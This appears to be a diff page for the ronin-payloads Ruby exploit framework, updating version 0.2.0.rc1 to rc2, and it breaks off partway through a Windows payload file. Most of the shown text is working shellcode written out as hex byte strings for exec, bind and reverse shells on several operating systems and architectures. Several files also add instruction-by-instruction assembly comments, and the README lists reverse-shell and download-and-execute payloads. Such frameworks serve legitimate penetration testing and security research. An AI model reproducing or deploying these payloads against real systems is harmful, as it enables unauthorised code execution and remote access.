ronin-payloads 0.2.0.rc1 → 0.2.0.rc2
Sign up to get free protection for your applications and to get access to all the features.
- checksums.yaml +4 -4
- data/.rubocop.yml +3 -0
- data/ChangeLog.md +7 -0
- data/README.md +17 -10
- data/lib/ronin/payloads/builtin/shellcode/freebsd/x86/bind_shell.rb +2 -1
- data/lib/ronin/payloads/builtin/shellcode/freebsd/x86/exec_shell.rb +2 -1
- data/lib/ronin/payloads/builtin/shellcode/freebsd/x86/reverse_shell.rb +2 -1
- data/lib/ronin/payloads/builtin/shellcode/freebsd/x86_64/exec_shell.rb +2 -1
- data/lib/ronin/payloads/builtin/shellcode/linux/arm/bind_shell.rb +2 -1
- data/lib/ronin/payloads/builtin/shellcode/linux/arm/exec_shell.rb +2 -1
- data/lib/ronin/payloads/builtin/shellcode/linux/arm/reverse_shell.rb +2 -1
- data/lib/ronin/payloads/builtin/shellcode/linux/mips/bind_shell.rb +2 -1
- data/lib/ronin/payloads/builtin/shellcode/linux/mips/exec_shell.rb +13 -12
- data/lib/ronin/payloads/builtin/shellcode/linux/mips/reverse_shell.rb +2 -1
- data/lib/ronin/payloads/builtin/shellcode/linux/ppc/exec_shell.rb +15 -14
- data/lib/ronin/payloads/builtin/shellcode/linux/ppc/reverse_shell.rb +2 -1
- data/lib/ronin/payloads/builtin/shellcode/linux/x86/bind_shell.rb +2 -1
- data/lib/ronin/payloads/builtin/shellcode/linux/x86/exec_shell.rb +2 -1
- data/lib/ronin/payloads/builtin/shellcode/linux/x86/reverse_shell.rb +2 -1
- data/lib/ronin/payloads/builtin/shellcode/linux/x86_64/bind_shell.rb +2 -1
- data/lib/ronin/payloads/builtin/shellcode/linux/x86_64/exec_shell.rb +11 -10
- data/lib/ronin/payloads/builtin/shellcode/linux/x86_64/reverse_shell.rb +2 -1
- data/lib/ronin/payloads/builtin/shellcode/macos/x86_64/exec_shell.rb +2 -1
- data/lib/ronin/payloads/builtin/shellcode/macos/x86_64/reverse_shell.rb +2 -1
- data/lib/ronin/payloads/builtin/shellcode/netbsd/x86/exec_shell.rb +2 -1
- data/lib/ronin/payloads/builtin/shellcode/openbsd/x86/bind_shell.rb +2 -1
- data/lib/ronin/payloads/builtin/shellcode/openbsd/x86/exec_shell.rb +13 -12
- data/lib/ronin/payloads/builtin/shellcode/windows/x86_64/cmd.rb +21 -20
- data/lib/ronin/payloads/builtin/test/cmd.rb +1 -1
- data/lib/ronin/payloads/builtin/test/open_redirect.rb +4 -1
- data/lib/ronin/payloads/builtin/test/url.rb +1 -1
- data/lib/ronin/payloads/builtin/test/xss.rb +4 -1
- data/lib/ronin/payloads/cli.rb +2 -0
- data/lib/ronin/payloads/version.rb +1 -1
- metadata +2 -2
checksums.yaml
CHANGED
|
@@ -1,7 +1,7 @@
|
|
|
1
1
|
---
|
|
2
2
|
SHA256:
|
|
3
|
-
metadata.gz:
|
|
4
|
-
data.tar.gz:
|
|
3
|
+
metadata.gz: f7c99de5c358d520d1a630234c470e342cc1cf7ca7c4dc505f4b32ba986cc91c
|
|
4
|
+
data.tar.gz: 2ed1c91535448f066b9484f1908a77017368103ab32f244f2db1ef246185e753
|
|
5
5
|
SHA512:
|
|
6
|
-
metadata.gz:
|
|
7
|
-
data.tar.gz:
|
|
6
|
+
metadata.gz: 2637643fc3bf62464bd3b73f4f90a55cfd55ffa4f20d3ecd1fcb3bcd2a59da799e756cbfd7b4ad1c10a69188eb70ea9461b8d33e8bf5d5f08657188936f4a880
|
|
7
|
+
data.tar.gz: cc2ab6fc8276eee61fc2191ddf06abe826cb2fa57d5efdd4b46f1716538b108b4e88e5377a117126bd5c1c89d654d75cfa191b95a83e0b0f5eb9c82f0e481304
|
data/.rubocop.yml
CHANGED
data/ChangeLog.md
CHANGED
|
@@ -43,6 +43,13 @@
|
|
|
43
43
|
`ronin-payloads build` command for the given payload.
|
|
44
44
|
* Renamed the `-e` option flag to `-E` in `ronin-payloads build`.
|
|
45
45
|
|
|
46
|
+
### 0.1.6 / 2024-07-01
|
|
47
|
+
|
|
48
|
+
#### Payloads
|
|
49
|
+
|
|
50
|
+
* Fixed `incompatible character encodings: UTF-8 and ASCII-8BIT` exceptions when
|
|
51
|
+
building shellcode payloads with certain IP addresses or port numbers.
|
|
52
|
+
|
|
46
53
|
### 0.1.5 / 2024-06-19
|
|
47
54
|
|
|
48
55
|
* Fixed order of arguments passed to `TCPServer.new` in
|
data/README.md
CHANGED
|
@@ -126,13 +126,17 @@ $ ronin-payloads list
|
|
|
126
126
|
cmd/awk/reverse_shell
|
|
127
127
|
cmd/bash/reverse_shell
|
|
128
128
|
cmd/lua/reverse_shell
|
|
129
|
+
cmd/netcat/bind_shell
|
|
129
130
|
cmd/node/reverse_shell
|
|
130
131
|
cmd/openssl/reverse_shell
|
|
131
132
|
cmd/perl/reverse_shell
|
|
132
133
|
cmd/php/reverse_shell
|
|
134
|
+
cmd/ping
|
|
133
135
|
cmd/powershell/reverse_shell
|
|
134
136
|
cmd/python/reverse_shell
|
|
135
137
|
cmd/ruby/reverse_shell
|
|
138
|
+
cmd/sleep
|
|
139
|
+
cmd/touch
|
|
136
140
|
cmd/windows/download
|
|
137
141
|
cmd/zsh/reverse_shell
|
|
138
142
|
groovy/reverse_shell
|
|
@@ -142,31 +146,33 @@ $ ronin-payloads list
|
|
|
142
146
|
php/cmd_exec
|
|
143
147
|
php/download_exec
|
|
144
148
|
shellcode/freebsd/x86/bind_shell
|
|
145
|
-
shellcode/freebsd/x86/
|
|
149
|
+
shellcode/freebsd/x86/exec_shell
|
|
146
150
|
shellcode/freebsd/x86/reverse_shell
|
|
147
|
-
shellcode/freebsd/x86_64/
|
|
151
|
+
shellcode/freebsd/x86_64/exec_shell
|
|
148
152
|
shellcode/linux/arm/bind_shell
|
|
149
|
-
shellcode/linux/arm/
|
|
153
|
+
shellcode/linux/arm/exec_shell
|
|
150
154
|
shellcode/linux/arm/reverse_shell
|
|
151
155
|
shellcode/linux/mips/bind_shell
|
|
152
|
-
shellcode/linux/mips/
|
|
156
|
+
shellcode/linux/mips/exec_shell
|
|
153
157
|
shellcode/linux/mips/reverse_shell
|
|
154
|
-
shellcode/linux/ppc/
|
|
158
|
+
shellcode/linux/ppc/exec_shell
|
|
155
159
|
shellcode/linux/ppc/reverse_shell
|
|
156
160
|
shellcode/linux/x86/bind_shell
|
|
157
|
-
shellcode/linux/x86/
|
|
161
|
+
shellcode/linux/x86/exec_shell
|
|
158
162
|
shellcode/linux/x86/reverse_shell
|
|
159
163
|
shellcode/linux/x86_64/bind_shell
|
|
160
|
-
shellcode/linux/x86_64/
|
|
164
|
+
shellcode/linux/x86_64/exec_shell
|
|
161
165
|
shellcode/linux/x86_64/reverse_shell
|
|
162
|
-
shellcode/macos/x86_64/
|
|
166
|
+
shellcode/macos/x86_64/exec_shell
|
|
163
167
|
shellcode/macos/x86_64/reverse_shell
|
|
164
|
-
shellcode/netbsd/x86/
|
|
168
|
+
shellcode/netbsd/x86/exec_shell
|
|
165
169
|
shellcode/netbsd/x86/reverse_shell
|
|
166
170
|
shellcode/openbsd/x86/bind_shell
|
|
167
|
-
shellcode/openbsd/x86/
|
|
171
|
+
shellcode/openbsd/x86/exec_shell
|
|
168
172
|
shellcode/windows/x86_64/cmd
|
|
173
|
+
test/cmd
|
|
169
174
|
test/open_redirect
|
|
175
|
+
test/url
|
|
170
176
|
test/xss
|
|
171
177
|
```
|
|
172
178
|
|
|
@@ -234,6 +240,7 @@ $ git push
|
|
|
234
240
|
Define a `/bin/sh` shellcode payload:
|
|
235
241
|
|
|
236
242
|
```ruby
|
|
243
|
+
# encoding: ASCII-8BIT
|
|
237
244
|
require 'ronin/payloads/shellcode_payload'
|
|
238
245
|
|
|
239
246
|
module Ronin
|
|
@@ -1,3 +1,4 @@
|
|
|
1
|
+
# encoding: ASCII-8BIT
|
|
1
2
|
# frozen_string_literal: true
|
|
2
3
|
#
|
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
|
@@ -58,7 +59,7 @@ module Ronin
|
|
|
58
59
|
"\x31\xc0\x50\x50\x52\xb0\x1e\x50\xcd\x80\xb1\x03\xbb\xff\xff" \
|
|
59
60
|
"\xff\xff\x89\xc2\x43\x53\x52\xb0\x5a\x50\xcd\x80\x80\xe9\x01" \
|
|
60
61
|
"\x75\xf3\x31\xc0\x50\x50\x56\xb0\x3b\x50\xcd\x80\xe8\x97\xff" \
|
|
61
|
-
"\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23"
|
|
62
|
+
"\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23"
|
|
62
63
|
end
|
|
63
64
|
|
|
64
65
|
end
|
|
@@ -1,3 +1,4 @@
|
|
|
1
|
+
# encoding: ASCII-8BIT
|
|
1
2
|
# frozen_string_literal: true
|
|
2
3
|
#
|
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
|
@@ -53,7 +54,7 @@ module Ronin
|
|
|
53
54
|
def build
|
|
54
55
|
@payload = "\x31\xc0\x50\x68\x2f\x2f\x73\x68" \
|
|
55
56
|
"\x68\x2f\x62\x69\x6e\x89\xe3\x50" \
|
|
56
|
-
"\x54\x53\xb0\x3b\x50\xcd\x80"
|
|
57
|
+
"\x54\x53\xb0\x3b\x50\xcd\x80"
|
|
57
58
|
end
|
|
58
59
|
|
|
59
60
|
end
|
|
@@ -1,3 +1,4 @@
|
|
|
1
|
+
# encoding: ASCII-8BIT
|
|
1
2
|
# frozen_string_literal: true
|
|
2
3
|
#
|
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
|
@@ -56,7 +57,7 @@ module Ronin
|
|
|
56
57
|
"\xe1\x6a\x10\x51\x52\x31\xc0\xb0\x62\x50\xcd\x80\x31\xc9" \
|
|
57
58
|
"\x51\x52\x31\xc0\xb0\x5a\x50\xcd\x80\xfe\xc1\x80\xf9\x03" \
|
|
58
59
|
"\x75\xf0\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69" \
|
|
59
|
-
"\x6e\x89\xe3\x50\x54\x53\xb0\x3b\x50\xcd\x80"
|
|
60
|
+
"\x6e\x89\xe3\x50\x54\x53\xb0\x3b\x50\xcd\x80"
|
|
60
61
|
end
|
|
61
62
|
|
|
62
63
|
end
|
|
@@ -1,3 +1,4 @@
|
|
|
1
|
+
# encoding: ASCII-8BIT
|
|
1
2
|
# frozen_string_literal: true
|
|
2
3
|
#
|
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
|
@@ -53,7 +54,7 @@ module Ronin
|
|
|
53
54
|
def build
|
|
54
55
|
@payload = "\x48\x31\xc9\x48\xf7\xe1\x04\x3b\x48\xbb" \
|
|
55
56
|
"\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x52\x53" \
|
|
56
|
-
"\x54\x5f\x52\x57\x54\x5e\x0f\x05"
|
|
57
|
+
"\x54\x5f\x52\x57\x54\x5e\x0f\x05"
|
|
57
58
|
end
|
|
58
59
|
|
|
59
60
|
end
|
|
@@ -1,3 +1,4 @@
|
|
|
1
|
+
# encoding: ASCII-8BIT
|
|
1
2
|
# frozen_string_literal: true
|
|
2
3
|
#
|
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
|
@@ -119,7 +120,7 @@ module Ronin
|
|
|
119
120
|
"\x08\x00\x8d\xe2" \
|
|
120
121
|
"\x00\x10\x8d\xe2" \
|
|
121
122
|
"\x04\x20\x8d\xe2" \
|
|
122
|
-
"\x0b\x00\x90\xef"
|
|
123
|
+
"\x0b\x00\x90\xef"
|
|
123
124
|
end
|
|
124
125
|
|
|
125
126
|
end
|
|
@@ -1,3 +1,4 @@
|
|
|
1
|
+
# encoding: ASCII-8BIT
|
|
1
2
|
# frozen_string_literal: true
|
|
2
3
|
#
|
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
|
@@ -60,7 +61,7 @@ module Ronin
|
|
|
60
61
|
"\xc2\x51\x03\x37" \
|
|
61
62
|
"\x01\xdf\x2f\x62" \
|
|
62
63
|
"\x69\x6e\x2f\x2f" \
|
|
63
|
-
"\x73\x68"
|
|
64
|
+
"\x73\x68"
|
|
64
65
|
end
|
|
65
66
|
|
|
66
67
|
end
|
|
@@ -1,3 +1,4 @@
|
|
|
1
|
+
# encoding: ASCII-8BIT
|
|
1
2
|
# frozen_string_literal: true
|
|
2
3
|
#
|
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
|
@@ -72,7 +73,7 @@ module Ronin
|
|
|
72
73
|
"#{packed_port}" \
|
|
73
74
|
"#{packed_ipv4}" \
|
|
74
75
|
\
|
|
75
|
-
"/bin/sh\0"
|
|
76
|
+
"/bin/sh\0"
|
|
76
77
|
end
|
|
77
78
|
|
|
78
79
|
end
|
|
@@ -1,3 +1,4 @@
|
|
|
1
|
+
# encoding: ASCII-8BIT
|
|
1
2
|
# frozen_string_literal: true
|
|
2
3
|
#
|
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
|
@@ -118,7 +119,7 @@ module Ronin
|
|
|
118
119
|
"\xf0\xff\xa5\x23" \
|
|
119
120
|
"\xab\x0f\x02\x24" \
|
|
120
121
|
"\x0c\x01\x01\x01" \
|
|
121
|
-
"/bin/sh"
|
|
122
|
+
"/bin/sh"
|
|
122
123
|
end
|
|
123
124
|
|
|
124
125
|
end
|
|
@@ -1,3 +1,4 @@
|
|
|
1
|
+
# encoding: ASCII-8BIT
|
|
1
2
|
# frozen_string_literal: true
|
|
2
3
|
#
|
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
|
@@ -51,18 +52,18 @@ module Ronin
|
|
|
51
52
|
# Builds the shellcode.
|
|
52
53
|
#
|
|
53
54
|
def build
|
|
54
|
-
@payload = "\x28\x06\xff\xff"
|
|
55
|
-
"\x3c\x0f\x2f\x2f"
|
|
56
|
-
"\x35\xef\x62\x69"
|
|
57
|
-
"\xaf\xaf\xff\xf4"
|
|
58
|
-
"\x3c\x0e\x6e\x2f"
|
|
59
|
-
"\x35\xce\x73\x68"
|
|
60
|
-
"\xaf\xae\xff\xf8"
|
|
61
|
-
"\xaf\xa0\xff\xfc"
|
|
62
|
-
"\x27\xa4\xff\xf4"
|
|
63
|
-
"\x28\x05\xff\xff"
|
|
64
|
-
"\x24\x02\x0f\xab"
|
|
65
|
-
"\x01\x01\x01\x0c"
|
|
55
|
+
@payload = "\x28\x06\xff\xff" + # slti a2,zero,-1
|
|
56
|
+
"\x3c\x0f\x2f\x2f" + # lui t7,0x2f2f
|
|
57
|
+
"\x35\xef\x62\x69" + # ori t7,t7,0x6269
|
|
58
|
+
"\xaf\xaf\xff\xf4" + # sw t7,-12(sp)
|
|
59
|
+
"\x3c\x0e\x6e\x2f" + # lui t6,0x6e2f
|
|
60
|
+
"\x35\xce\x73\x68" + # ori t6,t6,0x7368
|
|
61
|
+
"\xaf\xae\xff\xf8" + # sw t6,-8(sp)
|
|
62
|
+
"\xaf\xa0\xff\xfc" + # sw zero,-4(sp)
|
|
63
|
+
"\x27\xa4\xff\xf4" + # addiu a0,sp,-12
|
|
64
|
+
"\x28\x05\xff\xff" + # slti a1,zero,-1
|
|
65
|
+
"\x24\x02\x0f\xab" + # li v0,4011
|
|
66
|
+
"\x01\x01\x01\x0c" # syscall 0x40404
|
|
66
67
|
end
|
|
67
68
|
|
|
68
69
|
end
|
|
@@ -1,3 +1,4 @@
|
|
|
1
|
+
# encoding: ASCII-8BIT
|
|
1
2
|
# frozen_string_literal: true
|
|
2
3
|
#
|
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
|
@@ -100,7 +101,7 @@ module Ronin
|
|
|
100
101
|
"\x27\xa4\xff\xf4" \
|
|
101
102
|
"\x28\x05\xff\xff" \
|
|
102
103
|
"\x24\x02\x0f\xab" \
|
|
103
|
-
"\x01\x01\x01\x0c"
|
|
104
|
+
"\x01\x01\x01\x0c"
|
|
104
105
|
end
|
|
105
106
|
|
|
106
107
|
end
|
|
@@ -1,3 +1,4 @@
|
|
|
1
|
+
# encoding: ASCII-8BIT
|
|
1
2
|
# frozen_string_literal: true
|
|
2
3
|
#
|
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
|
@@ -51,20 +52,20 @@ module Ronin
|
|
|
51
52
|
# Builds the shellcode.
|
|
52
53
|
#
|
|
53
54
|
def build
|
|
54
|
-
@payload = "\x7c\x3f\x0b\x78"
|
|
55
|
-
"\x7c\xa5\x2a\x79"
|
|
56
|
-
"\x42\x40\xff\xf9"
|
|
57
|
-
"\x7f\x08\x02\xa6"
|
|
58
|
-
"\x3b\x18\x01\x34"
|
|
59
|
-
"\x98\xb8\xfe\xfb"
|
|
60
|
-
"\x38\x78\xfe\xf4"
|
|
61
|
-
"\x90\x61\xff\xf8"
|
|
62
|
-
"\x38\x81\xff\xf8"
|
|
63
|
-
"\x90\xa1\xff\xfc"
|
|
64
|
-
"\x3b\xc0\x01\x60"
|
|
65
|
-
"\x7f\xc0\x2e\x70"
|
|
66
|
-
"\x44\xde\xad\xf2"
|
|
67
|
-
"/bin/shZ"
|
|
55
|
+
@payload = "\x7c\x3f\x0b\x78" + # mr r31,r1
|
|
56
|
+
"\x7c\xa5\x2a\x79" + # xor. r5,r5,r5
|
|
57
|
+
"\x42\x40\xff\xf9" + # bdzl+ 10000454< main>
|
|
58
|
+
"\x7f\x08\x02\xa6" + # mflr r24
|
|
59
|
+
"\x3b\x18\x01\x34" + # addi r24,r24,308
|
|
60
|
+
"\x98\xb8\xfe\xfb" + # stb r5,-261(r24)
|
|
61
|
+
"\x38\x78\xfe\xf4" + # addi r3,r24,-268
|
|
62
|
+
"\x90\x61\xff\xf8" + # stw r3,-8(r1)
|
|
63
|
+
"\x38\x81\xff\xf8" + # addi r4,r1,-8
|
|
64
|
+
"\x90\xa1\xff\xfc" + # stw r5,-4(r1)
|
|
65
|
+
"\x3b\xc0\x01\x60" + # li r30,352
|
|
66
|
+
"\x7f\xc0\x2e\x70" + # srawi r0,r30,5
|
|
67
|
+
"\x44\xde\xad\xf2" + # .long 0x44deadf2
|
|
68
|
+
"/bin/shZ" # the last byte becomes NULL
|
|
68
69
|
end
|
|
69
70
|
|
|
70
71
|
end
|
|
@@ -1,3 +1,4 @@
|
|
|
1
|
+
# encoding: ASCII-8BIT
|
|
1
2
|
# frozen_string_literal: true
|
|
2
3
|
#
|
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
|
@@ -125,7 +126,7 @@ module Ronin
|
|
|
125
126
|
"\x3b\xc0\x01\x60" \
|
|
126
127
|
"\x7f\xc0\x2e\x70" \
|
|
127
128
|
"\x44\xde\xad\xf2" \
|
|
128
|
-
"/bin/shZ"
|
|
129
|
+
"/bin/shZ"
|
|
129
130
|
end
|
|
130
131
|
|
|
131
132
|
end
|
|
@@ -1,3 +1,4 @@
|
|
|
1
|
+
# encoding: ASCII-8BIT
|
|
1
2
|
# frozen_string_literal: true
|
|
2
3
|
#
|
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
|
@@ -98,7 +99,7 @@ module Ronin
|
|
|
98
99
|
"\x68\x2f\x62\x69\x6e" \
|
|
99
100
|
"\x89\xe3" \
|
|
100
101
|
"\xb0\x0b" \
|
|
101
|
-
"\xcd\x80"
|
|
102
|
+
"\xcd\x80"
|
|
102
103
|
end
|
|
103
104
|
|
|
104
105
|
end
|
|
@@ -1,3 +1,4 @@
|
|
|
1
|
+
# encoding: ASCII-8BIT
|
|
1
2
|
# frozen_string_literal: true
|
|
2
3
|
#
|
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
|
@@ -54,7 +55,7 @@ module Ronin
|
|
|
54
55
|
def build
|
|
55
56
|
@payload = "\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f" \
|
|
56
57
|
"\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd" \
|
|
57
|
-
"\x80"
|
|
58
|
+
"\x80"
|
|
58
59
|
end
|
|
59
60
|
|
|
60
61
|
end
|
|
@@ -1,3 +1,4 @@
|
|
|
1
|
+
# encoding: ASCII-8BIT
|
|
1
2
|
# frozen_string_literal: true
|
|
2
3
|
#
|
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
|
@@ -62,7 +63,7 @@ module Ronin
|
|
|
62
63
|
"\xc0\x52\x68\x6e\x2f\x73\x68\x68" \
|
|
63
64
|
"\x2f\x2f\x62\x69\x89\xe3\x52\x53" \
|
|
64
65
|
"\x89\xe1\x52\x89\xe2\xb0\x0b\xcd" \
|
|
65
|
-
"\x80"
|
|
66
|
+
"\x80"
|
|
66
67
|
end
|
|
67
68
|
|
|
68
69
|
end
|
|
@@ -1,3 +1,4 @@
|
|
|
1
|
+
# encoding: ASCII-8BIT
|
|
1
2
|
# frozen_string_literal: true
|
|
2
3
|
#
|
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
|
@@ -59,7 +60,7 @@ module Ronin
|
|
|
59
60
|
"\x05\xfe\xc0\x89\xc6\xb0\x21\x0f\x05\xfe\xc0\x89\xc6\xb0\x21" \
|
|
60
61
|
"\x0f\x05\x48\x31\xd2\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68" \
|
|
61
62
|
"\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xc0\x50\x57\x48\x89" \
|
|
62
|
-
"\xe6\xb0\x3b\x0f\x05\x50\x5f\xb0\x3c\x0f\x05"
|
|
63
|
+
"\xe6\xb0\x3b\x0f\x05\x50\x5f\xb0\x3c\x0f\x05"
|
|
63
64
|
end
|
|
64
65
|
|
|
65
66
|
end
|
|
@@ -1,3 +1,4 @@
|
|
|
1
|
+
# encoding: ASCII-8BIT
|
|
1
2
|
# frozen_string_literal: true
|
|
2
3
|
#
|
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
|
@@ -51,16 +52,16 @@ module Ronin
|
|
|
51
52
|
# Builds the shellcode.
|
|
52
53
|
#
|
|
53
54
|
def build
|
|
54
|
-
@payload = "\x48\x31\xd2"
|
|
55
|
-
"\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68"
|
|
56
|
-
"\x48\xc1\xeb\x08"
|
|
57
|
-
"\x53"
|
|
58
|
-
"\x48\x89\xe7"
|
|
59
|
-
"\x50"
|
|
60
|
-
"\x57"
|
|
61
|
-
"\x48\x89\xe6"
|
|
62
|
-
"\xb0\x3b"
|
|
63
|
-
"\x0f\x05"
|
|
55
|
+
@payload = "\x48\x31\xd2" + # xor %rdx, %rdx
|
|
56
|
+
"\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68" + # mov $0x68732f6e69622f2f, %rbx
|
|
57
|
+
"\x48\xc1\xeb\x08" + # shr $0x8, %rbx
|
|
58
|
+
"\x53" + # push %rbx
|
|
59
|
+
"\x48\x89\xe7" + # mov %rsp, %rdi
|
|
60
|
+
"\x50" + # push %rax
|
|
61
|
+
"\x57" + # push %rdi
|
|
62
|
+
"\x48\x89\xe6" + # mov %rsp, %rsi
|
|
63
|
+
"\xb0\x3b" + # mov $0x3b, %al
|
|
64
|
+
"\x0f\x05" # syscall
|
|
64
65
|
end
|
|
65
66
|
|
|
66
67
|
end
|
|
@@ -1,3 +1,4 @@
|
|
|
1
|
+
# encoding: ASCII-8BIT
|
|
1
2
|
# frozen_string_literal: true
|
|
2
3
|
#
|
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
|
@@ -58,7 +59,7 @@ module Ronin
|
|
|
58
59
|
"\x5a\x41\x50\x5f\x6a\x2a\x58\x0f\x05\x48\x31\xf6\x6a\x03\x5e\x48" \
|
|
59
60
|
"\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x48\x31\xff\x57\x57\x5e\x5a" \
|
|
60
61
|
"\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54" \
|
|
61
|
-
"\x5f\x6a\x3b\x58\x0f\x05"
|
|
62
|
+
"\x5f\x6a\x3b\x58\x0f\x05"
|
|
62
63
|
end
|
|
63
64
|
|
|
64
65
|
end
|
|
@@ -1,3 +1,4 @@
|
|
|
1
|
+
# encoding: ASCII-8BIT
|
|
1
2
|
# frozen_string_literal: true
|
|
2
3
|
#
|
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
|
@@ -55,7 +56,7 @@ module Ronin
|
|
|
55
56
|
@payload = "\x48\x31\xd2\x48\xc7\xc0\xf6\xff\xff\x01" \
|
|
56
57
|
"\x48\x83\xc0\x45\x5f\x52\x57\x48\x89\xe6" \
|
|
57
58
|
"\x0f\x05\xe8\xe5\xff\xff\xff\x2f\x62\x69" \
|
|
58
|
-
"\x6e\x2f\x2f\x73\x68"
|
|
59
|
+
"\x6e\x2f\x2f\x73\x68"
|
|
59
60
|
end
|
|
60
61
|
|
|
61
62
|
end
|
|
@@ -1,3 +1,4 @@
|
|
|
1
|
+
# encoding: ASCII-8BIT
|
|
1
2
|
# frozen_string_literal: true
|
|
2
3
|
#
|
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
|
@@ -60,7 +61,7 @@ module Ronin
|
|
|
60
61
|
"\xe8\x08\x48\x31\xf6\x4c\x89\xc0\x4c\x89\xe7\x0f\x05\x48\x83" \
|
|
61
62
|
"\xfe\x02\x48\xff\xc6\x76\xef\x49\x83\xe8\x1f\x4c\x89\xc0\x48" \
|
|
62
63
|
"\x31\xd2\x49\xbd\xff\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xed" \
|
|
63
|
-
"\x08\x41\x55\x48\x89\xe7\x48\x31\xf6\x0f\x05"
|
|
64
|
+
"\x08\x41\x55\x48\x89\xe7\x48\x31\xf6\x0f\x05"
|
|
64
65
|
end
|
|
65
66
|
|
|
66
67
|
end
|
|
@@ -1,3 +1,4 @@
|
|
|
1
|
+
# encoding: ASCII-8BIT
|
|
1
2
|
# frozen_string_literal: true
|
|
2
3
|
#
|
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
|
@@ -74,7 +75,7 @@ module Ronin
|
|
|
74
75
|
"\x01\x01\x01\x01" \
|
|
75
76
|
"\x02\x02\x02\x02" \
|
|
76
77
|
"\x03\x03\x03\x03" \
|
|
77
|
-
"\x9a\x04\x04\x04\x04\x07\x04"
|
|
78
|
+
"\x9a\x04\x04\x04\x04\x07\x04"
|
|
78
79
|
end
|
|
79
80
|
|
|
80
81
|
end
|
|
@@ -1,3 +1,4 @@
|
|
|
1
|
+
# encoding: ASCII-8BIT
|
|
1
2
|
# frozen_string_literal: true
|
|
2
3
|
#
|
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
|
@@ -60,7 +61,7 @@ module Ronin
|
|
|
60
61
|
"\xef\xeb\x23\x5b\x89\x1f\x31\xc9\x88\x4b\x07\x89\x4f\x04\x51\x8d" \
|
|
61
62
|
"\x07\x50\x8b\x07\x50\x50\x31\xc0\xb0\x3b\xcd\x80\x31\xc9\x51\x51" \
|
|
62
63
|
"\x31\xc0\xb0\x01\xcd\x80\xe8\xd8\xff\xff\xff\x2f\x62\x69\x6e\x2f" \
|
|
63
|
-
"\x73\x68\x41\x90"
|
|
64
|
+
"\x73\x68\x41\x90"
|
|
64
65
|
end
|
|
65
66
|
|
|
66
67
|
end
|
|
@@ -1,3 +1,4 @@
|
|
|
1
|
+
# encoding: ASCII-8BIT
|
|
1
2
|
# frozen_string_literal: true
|
|
2
3
|
#
|
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
|
@@ -52,18 +53,18 @@ module Ronin
|
|
|
52
53
|
# Builds the shellcode.
|
|
53
54
|
#
|
|
54
55
|
def build
|
|
55
|
-
@payload = "\x99"
|
|
56
|
-
"\x52"
|
|
57
|
-
"\x68\x6e\x2f\x73\x68"
|
|
58
|
-
"\x68\x2f\x2f\x62\x69"
|
|
59
|
-
"\x89\xe3"
|
|
60
|
-
"\x52"
|
|
61
|
-
"\x54"
|
|
62
|
-
"\x53"
|
|
63
|
-
"\x53"
|
|
64
|
-
"\x6a\x3b"
|
|
65
|
-
"\x58"
|
|
66
|
-
"\xcd\x80"
|
|
56
|
+
@payload = "\x99" + # cltd
|
|
57
|
+
"\x52" + # push %edx
|
|
58
|
+
"\x68\x6e\x2f\x73\x68" + # push $0x68732f6e
|
|
59
|
+
"\x68\x2f\x2f\x62\x69" + # push $0x69622f2f
|
|
60
|
+
"\x89\xe3" + # mov %esp,%ebx
|
|
61
|
+
"\x52" + # push %edx
|
|
62
|
+
"\x54" + # push %esp
|
|
63
|
+
"\x53" + # push %ebx
|
|
64
|
+
"\x53" + # push %ebx
|
|
65
|
+
"\x6a\x3b" + # push $0x3b
|
|
66
|
+
"\x58" + # pop %eax
|
|
67
|
+
"\xcd\x80" # int $0x80
|
|
67
68
|
end
|
|
68
69
|
|
|
69
70
|
end
|
|
@@ -1,3 +1,4 @@
|
|
|
1
|
+
# encoding: ASCII-8BIT
|
|
1
2
|
# frozen_string_literal: true
|
|
2
3
|
#
|
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
|
@@ -52,26 +53,26 @@ module Ronin
|
|
|
52
53
|
# Builds the shellcode.
|
|
53
54
|
#
|
|
54
55
|
def build
|
|
55
|
-
@payload = "\x31\xC9"
|
|
56
|
-
"\x64\x8B\x71\x30"
|
|
57
|
-
"\x8B\x76\x0C"
|
|
58
|
-
"\x8B\x76\x1C"
|
|
59
|
-
"\x8B\x36"
